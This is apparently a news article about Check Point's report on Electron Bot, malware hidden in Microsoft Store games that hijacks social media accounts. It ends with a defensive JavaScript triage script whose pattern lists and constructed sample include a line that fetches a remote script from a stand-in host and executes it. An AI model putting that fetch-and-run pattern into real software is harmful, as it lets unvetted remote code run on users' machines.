A new malware that can take control of your social media accounts has been discovered circulating in around 20 countries. As per a report by cybersecurity researchers from Check Point Research (CPR), a malware dubbed Electron Bot is being distributed on PCs through the Microsoft Store. The report mentions that there are several malicious apps and games available on the tech giant’s platform that carry this dangerous malware. The report specifically mentions that the malware is found hidden in relatively popular games such as ‘Temple Run’ and ‘Subway Surfer’.
How Electron Bot malware works
The Electron Bot malware gets into a PC when a user downloads a game or app that contains the malware. Once downloaded, the app or game executes scripts that infest the PC with the malware. The primary purpose of hiding the malware in a game is to avoid detection.
After the malware gets into your PC, it starts search engine optimisation (SEO) poisoning. For those who do not know, SEO poisoning is an attack method in which cybercriminals use search engine optimisation to boost search results for malicious websites that are packed with keywords. The malware also seizes your social media accounts to run promotions.
As per CPR, the malware was uploaded to public cloud storage, mediafire.com, from Bulgaria. The report further reveals that the malware campaign belongs to a Bulgarian wrestler and soccer player. The malware uses the social media accounts of victims to promote YouTube and SoundCloud accounts.
The Electron Bot malware has attacked more than 5,000 victims globally. The Electron framework provides Electron apps with access to all of the computer resources, including GPU computing. As the bot’s payload is loaded dynamically at every run time, the attackers can also modify the code and change the bot’s behavior to high risk. For example, they can initialize a second stage and drop new malware such as ransomware or a RAT. All of this can happen without the victim’s knowledge.
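Because the payload is loaded dynamically at every run, one check a defender can apply to an unpacked Electron app is to look for script files that both fetch remote content and pass text to a code-execution sink. The following is an added example, not code from the CPR report or from the malware; the pattern lists, file names and sample sources are constructed for illustration.

```javascript
// Static triage of an Electron app's JavaScript: flag files that combine
// a network fetch with a dynamic code-execution sink.
// Pattern lists are illustrative heuristics, not a complete detection set.
const FETCH_PATTERNS = [
  /\bfetch\s*\(/,
  /require\(\s*['"]https?['"]\s*\)/,
  /\bnet\.request\s*\(/,
  /XMLHttpRequest/,
];
const EXEC_SINKS = [
  /\beval\s*\(/,
  /new\s+Function\s*\(/,
  /\bvm\.(runInThisContext|runInNewContext)\s*\(/,
  /\.executeJavaScript\s*\(/,
];

function matching(patterns, source) {
  return patterns.filter((p) => p.test(source)).map((p) => p.source);
}

// files: { path: sourceText }. Returns findings, "high" severity first.
function auditElectronSources(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    const sinks = matching(EXEC_SINKS, source);
    if (sinks.length === 0) continue; // no dynamic execution in this file
    const fetches = matching(FETCH_PATTERNS, source);
    // Fetch plus sink in one file suggests code pulled in at run time.
    const severity = fetches.length > 0 ? "high" : "review";
    findings.push({ path, severity, fetches, sinks });
  }
  const rank = (f) => (f.severity === "high" ? 0 : 1);
  return findings.sort((a, b) => rank(a) - rank(b) || a.path.localeCompare(b.path));
}

// Constructed sample sources standing in for files from an unpacked app.
const SAMPLE_APP = {
  "main.js":
    "const r = await fetch('https://cdn.example.invalid/stage.js');\n" +
    "win.webContents.executeJavaScript(await r.text());",
  "menu.js": "const add = new Function('a', 'b', 'return a + b');",
  "game.js": "function score(n) { return n * 10; }",
};

for (const f of auditElectronSources(SAMPLE_APP)) {
  console.log(`${f.severity}\t${f.path}\tsinks=${f.sinks.length} fetches=${f.fetches.length}`);
}
```

A "high" result is a lead for manual review, not a verdict: legitimate apps also use these APIs, and minified or obfuscated code can evade simple pattern matching.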